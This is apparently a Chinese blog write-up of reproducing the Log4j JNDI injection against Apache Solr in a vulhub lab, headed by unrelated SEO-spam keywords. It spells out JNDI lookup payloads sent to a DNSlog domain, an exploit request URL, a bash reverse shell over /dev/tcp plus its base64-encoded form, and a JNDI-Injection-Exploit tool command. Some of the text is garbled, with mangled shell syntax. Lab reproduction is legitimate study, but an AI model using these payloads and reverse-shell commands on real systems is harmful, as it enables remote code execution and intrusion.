php网站标题修改,获取网站状态,iis做的网站模板,去菲律宾做网站本地下载vulhub复现就完了#xff0c;环境搭建不讲#xff0c;网上其他文章很好。 访问该环境#xff1a; POC 构造#xff08;任选其一#xff09;#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…本地下载vulhub复现就完了环境搭建不讲网上其他文章很好。 访问该环境 POC 构造任选其一 ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是用了yakit生成了一个可用域名当然直接去dnslog平台生成也可以但是我用习惯这个地方了还是相当好用的一款国产化漏洞挖掘集成器。 访问
http://192.168.220.142:8983/solr/admin/cores?action${jndi:ldap://${sys:java.version}.rsjlpxqral.dgrh3.cn}访问之后出现一条dnslog日志 并且知道了java的版本是1.8.0_102 因为poc里面加了一个查看java版本的命令${sys:java.version}所以讲java版本结果回显在dnslog上面来了。
下面说怎么反弹shell操作
bash -i /dev/tcp/192.168.220.142/6666 01意思是把shell回弹到/192.168.220.142/6666地方 bash编码一下https://www.sqlsec.com/rce/
bash -c {echo, YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i}下载利用工具https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 使用命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo, YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i} -A http://192.168.220.142/ -C是编码后的内容-A是反弹shell的ip地址。 注意要先nc监听6666端口 如上图访问
http://192.168.220.142:8983/solr/admin/cores?action${jndi:ldap://192.168.220.142:1099/eftobp}额 不知道为啥子没成功。。。。。 然后看了看其他人的文章发现 就这样吧反正搞懂了过程也知道实战中怎么利用了。 而且我的环境是java1.8真搞不懂 下面来看下原理吧
Log4j→Log for JavaApache的开源日志记录组件JDK→1.8u21以下的版本看这篇文章吧直接https://blog.csdn.net/FisrtBqy/article/details/130680143